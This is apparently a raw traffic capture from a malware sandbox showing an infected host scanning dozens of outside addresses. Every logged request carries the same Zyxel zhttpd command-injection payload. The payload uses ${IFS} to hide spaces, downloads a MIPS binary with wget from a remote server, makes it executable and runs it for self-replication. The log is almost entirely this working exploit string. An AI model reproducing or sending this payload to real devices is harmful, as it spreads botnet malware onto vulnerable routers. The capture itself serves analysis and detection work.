                                                        Jan 28, 2024 10:12:52.398175955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4265192.168.2.1453098180.6.73.250443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.398209095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4266192.168.2.1456240218.92.84.31443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.398250103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4267192.168.2.1453392208.28.149.66443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.398269892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4268192.168.2.1438878195.119.43.19443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.398325920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4269192.168.2.145700817.96.160.150443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.398359060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4270192.168.2.1439064173.68.200.251443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.398407936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4271192.168.2.144460068.180.208.56443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.398428917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4272192.168.2.1451878180.204.148.25443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.398487091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4273192.168.2.1453734136.16.177.61443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.398523092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4274192.168.2.1453070160.124.27.55443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.398555040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4275192.168.2.1448808165.168.16.122443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.398593903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4276192.168.2.144308812.154.239.54443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.398643017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4277192.168.2.145346280.125.159.113443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.398685932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4278192.168.2.1460294197.117.174.68443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.398725986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4279192.168.2.145253844.122.176.123443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.398765087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4280192.168.2.144870289.117.242.89443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.398802996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4281192.168.2.1453454107.15.72.158443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.398835897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4282192.168.2.14397102.171.8.141443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.398875952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4283192.168.2.145881444.232.212.176443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.398905039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4284192.168.2.145929650.102.26.64443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.398943901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4285192.168.2.1443242180.36.99.224443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.398988962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4286192.168.2.143732069.105.137.73443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.399004936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4287192.168.2.144693091.6.48.121443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.399056911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4288192.168.2.1437360209.200.186.51443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.399100065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4289192.168.2.143286640.235.76.96443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.399125099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4290192.168.2.143937236.222.104.160443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.399166107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4291192.168.2.1441648173.230.236.240443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.399204016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4292192.168.2.1439572154.178.188.69443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.399231911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4293192.168.2.145057896.10.200.105443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.399286032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4294192.168.2.144264077.56.250.208443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.399291992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4295192.168.2.144046458.227.32.149443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.399352074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4296192.168.2.1453800155.94.72.180443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.399389029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4297192.168.2.144159886.137.153.130443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.399414062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4298192.168.2.1459222128.97.143.142443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.399440050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4299192.168.2.145614680.59.146.229443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.399483919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4300192.168.2.1460458132.9.172.174443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.399513960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4301192.168.2.1435058100.194.72.252443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.399565935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4302192.168.2.1444904152.230.5.226443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.399602890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4303192.168.2.1439390163.136.138.39443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.399637938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4304192.168.2.1449318147.177.0.182443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.399687052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4305192.168.2.144974246.7.239.106443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.399720907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4306192.168.2.1455212180.223.71.244443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.399768114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4307192.168.2.143434836.225.235.42443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.399811029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4308192.168.2.144766890.11.129.82443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.399832964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4309192.168.2.143983654.151.217.177443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.399868011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4310192.168.2.1437938133.228.205.16443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.399900913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4311192.168.2.1438918188.158.223.68443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.399947882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4312192.168.2.1459338211.78.148.158443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.400002956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4313192.168.2.145662654.143.249.217443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.400034904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4314192.168.2.1456100189.33.72.157443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.400069952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4315192.168.2.143408262.34.195.134443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.400122881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4316192.168.2.1434062180.243.52.227443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.400163889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4317192.168.2.1440710194.173.37.18443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.400191069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4318192.168.2.1459248180.44.44.21443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.400249958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4319192.168.2.1443340104.55.92.41443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.400269985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4320192.168.2.1444596211.238.117.124443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.400314093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4321192.168.2.1453178219.226.13.89443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.400363922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4322192.168.2.1440584195.0.34.254443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.400382996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4323192.168.2.1451320129.5.152.86443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.400561094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4324192.168.2.143832618.224.255.181443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.400563002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4325192.168.2.1455392197.31.87.91443
                                                        TimestampBytes transferredDirectionData
